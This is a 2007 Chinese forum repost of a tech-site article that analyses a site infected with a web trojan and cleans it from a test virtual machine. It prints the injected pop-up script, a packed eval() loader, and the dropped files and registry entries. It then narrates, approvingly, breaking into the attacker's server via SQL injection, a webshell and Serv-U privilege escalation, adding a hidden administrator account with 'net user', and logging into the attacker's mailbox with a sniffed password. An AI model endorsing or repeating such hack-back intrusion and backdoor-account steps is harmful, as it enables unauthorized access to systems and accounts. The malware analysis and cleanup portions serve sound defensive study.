以毒攻毒直捣“毒窟”

陈晓晨 发表于 2007-12-21 02:07:10

作者: 甘肃/老五, 　出处:IT专家网,
如今互联网上木马病毒十分猖獗，您一不小心就可能深陷病毒的泥潭，如何及时发现并对这种恼人的网络威胁宣战？如何避免用户的信息安全呢？本文将详细介绍……
<DIV class=guanggao></DIV>
　　【<A class=bluekey href="http://whatis.ctocio.com.cn/searchwhatis/250/6025750.shtml" target=_blank>IT</A>专家网独家】说互联网上到处是“马窝”、“毒窟”，你信吗?不信?我们就来个现场直播!上演一场以毒攻毒，直捣“毒窝”的攻坚战，出发......
　　一、陷入毒窝
　　我们在<A class=bluekey href="http://whatis.ctocio.com.cn/searchwhatis/191/6093191.shtml" target=_blank>Google</A>中搜索资料的时候，经常会看到这样的搜索结果“该网站可能含有恶意软件，有可能会危害您的电脑。”或者“继续访问 http://www.*.<A class=bluekey href="http://whatis.ctocio.com.cn/searchwhatis/307/5947307.shtml" target=_blank>com</A>，但风险自担。”这是Google以自己的方式对网页安全性分析的结果。我们没有理由怀疑Google的技术，这是它在以自己的方式告诉我们“这是个毒窝”。以“不入虎穴，焉得虎子”的英勇，我们就去探探虎穴。
　　测试环境说明：一安装有Windows XP的虚拟机，没有打补丁包，没有安装杀毒软件和防火墙。
　　1.探毒
　　第一步：下载网页
　　(为了不至于“出师未捷，而光荣牺牲。”我先把挂马的网页下载下来。看看到底用了什么网马，怎么挂的?)用迅雷很快地把挂了马的网页下载下来。
　　第二步：分析网页代码
　　用记事本打开网页查看源代码，通过分析，发现挂马者在该网站的首页的开头和尾部都加入了如下的代码：

<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3>
<SCRIPT language=javascript>         window.open  ("http://www.*.com/1.<A class=bluekey href="http://whatis.ctocio.com.cn/searchwhatis/154/5948154.shtml" target=_blank>htm</A>","","<A class=bluekey href="http://whatis.ctocio.com.cn/searchwhatis/247/6092747.shtml" target=_blank>toolbar</A>=no,location=no,directories=no,status=no,menubar=no,scro  llbars=no,width=1,height=1");   </script></TD></TR></TBODY></TABLE>
　　这是一个用javascript脚本木马的代码，其中的<A href="http://www.*.com/1.htm">http://www.*.com/1.htm</A>应该是网页木马的地址。
　　第三步：继续用迅雷下载<A href="http://www.*.com/1.htm">http://www.*.com/1.htm</A>，用记事本打开，代码如下:

<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3><script language=javascript src="http://my.*.com/admin.js>";</script> </TD></TR></TBODY></TABLE>
　　这是一个木马脚本，通过脚本调用了一个js文件。
　　第四步：用迅雷下载admin.js文件，用记事本打开，部分代码如下：

<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?<A class=bluekey href="http://whatis.ctocio.com.cn/searchwhatis/400/6026400.shtml" target=_blank>String</A>.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d=k||e(c);k=}];e=function(){return'\\w+'};c=1;};while(c--)if(k)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k);return p;}('Z("\\l\\t\\6\\9\\2\\g\\f\\6\\1\\K\\6\\d\\6\\b\\1\\Q\\1\\u\\5\\7\\1\\6\\t\\c\\q\\0\\7\\1\\j\\1\\L\\5\\2（中间省去n多......）\\f\\e\\0\\6\\3\\i\\p\\b\\8\\1\\O\\1\\9\\5\\2\\9\\x\\d\\g\\b\\1\\Q\\1\\g\\j\\o\\8\\1\\O")',62,68,'145|40|164|<A class=bluekey href="http://whatis.ctocio.com.cn/searchwhatis/281/5949281.shtml" target=_blank>42</A>|56|141|156|162|73|143|144|51|155|50|160|157|151|154|54|75|123|146|163|47|61|60|142|170|53|165|166|106|103|150|117|152|101|57|171|167|55|105|124|102|66|63|147|115|71|65|175|120|173|62|121|72|134|104|107|176|52|eval|114|110|127|70|64|130'.split('|'),0,{}))</TD></TR></TBODY></TABLE>
　　很明显这个网马加密并且编译了，通过Google查询这应该是冰狐的网马。
　　2.试毒：用虚拟机器的浏览器中打开被挂马的网页地址，有一个小窗口突然闪了一下消失了，网页迟迟不能打开，桌面任务栏上的网络连接图表突然长亮，硬盘狂响，应该是在往硬盘上下载什么。不管什么了，我不入地狱，谁入地狱?大概20秒钟好像木马好像已经下载完毕并运行了。
　　二、刮骨疗伤
　　木马入驻系统后对几个关键的地方进行查看。
　　刮骨：
　　1.任务管理器：
　　运行任务管理器，通过和以前的<A class=bluekey href="http://whatis.ctocio.com.cn/searchwhatis/292/7333792.shtml" target=_blank>进程</A>对比发现多了lexplore.exe、SVCH0ST.EXE(0是数字)两个未知进程。试着结束lexplore.exe进程，可以，但不到五秒钟又出现了。结束SVCH0ST.EXE进程，同样不到一秒也出现了。为什么会这样呢?通过分析发现：原来这两个进程是木马释放的两个文件创建的，构成了双保险，互相监视。当一方的进程被结束，另一方在下一个周期内对进程表进行扫描发现对方不在，就重新创建一个。另外如果有一个文件被删除，Wlgx.dll会重新释放一个(这是后来才发现的)。
　　2.在搜索最新的文件：
　　通过“资源管理器”→“工具”→“文件夹选项”→“查看”中设置“显示所有的文件”，运用文件搜索工具搜索今天创建的所有文件。通过对搜索结果的分析发现了几个可疑的文件，它们分别是：
　　临时目录：%temp%\Wl2\lexplore.exe)
　　释放库文件：%temp%\Wlgx.dll
　　系统目录：%systemroot%\system32\SVCH0ST.EXE %systemroot%\system32\lexplore.exe
　　在每个根目录下出现了三个文件：auatorun.inf、lexplore.exe、SVCH0ST.EXE(目的是在打开各个根目录的时候病毒会自动运行。)
　　注：以上文件都是隐藏、只读、系统文件。
　　3.注册表中新添加的项目
　　
　　"myWl2"="%temp%\Wl2\lexplore.exe"
　　
　　"Shell"="EXPLORER.EXE,SVCH0ST.EXE"
　　4.服务管理器
　　运行服务管理器通过对比发现多了两个可疑的项目：
　　服务名称：SVCH0ST
　　显示名称：SVCHOST
　　描述：系统网络服务组件
　　可执行文件的路径：c:\windows\system32\SVCH0ST.EXE
　　启动类型：自动
　　服务状态：启动
　　服务名称：lexplore.exe
　　显示名称：lexplore.exe
　　描述：网络浏览辅助
　　可执行文件的路径：c:\windows\system32\lexplore.exe
　　启动类型：自动
　　服务状态：启动
疗伤：
　　1.结束进程：由于这两个进程直接互相保护，只能采取非常规的办法，用批处理，代码如下：

<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3>@echo off taskkill /f /im SVCH0ST.EXE copy c:\windows\notepad.exe c:\windows\system32\SVCH0ST.EXE taskkill /f /im lexplore.exe del c:\windows\system32\SVCH0ST.EXE del c:\windows\system32\lexplore.exe exit</TD></TR></TBODY></TABLE>
　　说明：(1).由于两个进程之间互相保护，大概每隔五秒钟就扫描一次进程，如果用手工的方法太慢，没有等把源文件删除，木马的进程已经被创建出来，就无法删除源文件。(2).代码第三行在SVCHOST.EXE进程被结束掉后，用notepad.exe(记事本)程序替换木马程序，那么当lexplore.exe进程发现SVCH0ST.EXE进程被结束重新创建的该进程，其实就是打开了记事本程序。那么现在结束lexplore.exe进程，就不会有真正的SVCH0ST.EXE保护了。
　　2.删除病毒文件：两个系统目录下的病毒文件被删除，其它地方的病毒我们同样用批处理，代码如下：

<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3>
@echo off del %temp%\Wl2\lexplore.exe del %temp%\Wlgx.dll cd attrib -a -s -h autorun.inf attrib -a -s -h lexplore.exe attrib -a -s -h SVCH0ST.EXE del autorun.inf del lexplore.exe del SVCH0ST.EXE d: attrib -a -s -h autorun.inf attrib -a -s -h lexplore.exe attrib -a -s -h SVCH0ST.EXE del autorun.inf del lexplore.exe del SVCH0ST.EXE</TD></TR></TBODY></TABLE>
　　注：我的虚拟机只有两个分区，为了下面的木马分析，我保存了lexplore.exe、SVCH0ST.EXE、Wlgx.dll木马文件。
　　三、深入毒窝
　　文章写到这里，突然有个想法，进入毒窟看看!试试能否进入那台挂马者放置木马文件主机。
　　这是一台web服务器，先旁注看看目标还有什么站，结果发现是一个商业站点，只有一个站，主机是独立的。不管那么多，开着X-Scan扫描一下再说，接着去问问“Google”，看看到底是个什么站。关键字输入：http://www.*.com(安全原因，用了*)结果什么也没有出来，点击下面的“寻找网页包含有www.*.com”，出现了不该看到的结果。这些网站都被插入了木马，真可怜，稍微整理了一下搜索结果，除去有些站长求助的帖子外，足有30多个不同的站点被插入了恶意代码!而且都是国内的站点。先不管了，看看我的扫描结果，目标开了21.80.3389端口。21的FTP连接不上，80是网址服务器，3389是默认的终端服务器，先3389连接看看，过了N久才连接上，速度特慢。尝试了几个弱密码均告失败。去http://www.ip138.com看了一下，填上Ping出来的ip地址，才发现是深圳网通的主机，和笔者所在地区相隔太远，怪不得这么慢。
　　换个思路，试试为web注入，千辛万苦找到一个注入点，获取管理员账户和密码，扫描得到网站后台，登录进入后台，通过“备份数据库”得到一个webshell。试试cmd，可以执行，但权限太低。对方开来ftp应该安装有ftp软件。果然在“c:\Program Files”中看到了Serv-U，著名的Serv-U漏洞大家都知道吧!试试提权，不成功!上传一个ftp提取工具，再试成功。可以马上创建一个管理员用户：

<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3>net user asp$ "test" /add net localgroup administrators asp$ /add</TD></TR></TBODY></TABLE>
　　389远程登录，大概看了一下帮管理员清除了网马，留言提示管理员修补漏洞，撤人。
　　四、还治其人
　　通过分析SVCH0ST.EXE是木马的主程序，运用查壳工具发现加了壳，马上脱壳。用十六进制编辑器WinHex打开脱壳后的木马，估计是个QQ尾巴木马，这样的木马是用来盗取QQ的，一般把盗取的QQ号和密码发到指定的邮箱，或者ftp服务器的一个文件中。以http、www搜索，没有结果，看来它不是用ftp文件形式存放QQ号和密码的。再以@*.com搜索，终于看到了一个邮箱地址*@gmail.com(安全原因，用了*)，查找密码，没有发现，一定是加密了。一般这样的木马在配置的时候必须要填入邮箱密码，不然不能发送邮件。我们先打开嗅探工具，我用的是WSockExpert，设置对于SVCH0ST.EXE的网络数据进行嗅探。接着运行QQ输入用户名和密码登录，登录成功，这期间看见WSockExpert再不断地抓包，大概再QQ登录后一分钟停止嗅探。通过对数据包的分析很快找到了邮箱密码，因为是明文，所有很好找。马上登录邮箱，成功了!好家伙，竟然盗了这么多，我的QQ号和密码赫然其中!怎么办?改了他的邮箱密码吗?算了，删了与QQ相关的邮件，另外用邮箱自发一个警告邮件!
　　结束语：这次“攻毒”行动，虽有波折，但还算顺利。用两句话来结束这篇文章：我不入地狱，谁人地狱?我入地狱，为了你们不入地狱!

dannycom 发表于 2007-12-21 02:49:08

国家养猪场 发表于 2007-12-21 19:45:18

页: [1]

SINOFACE|海华网's Archiver

以毒攻毒 直捣“毒窟”

以毒攻毒直捣“毒窟”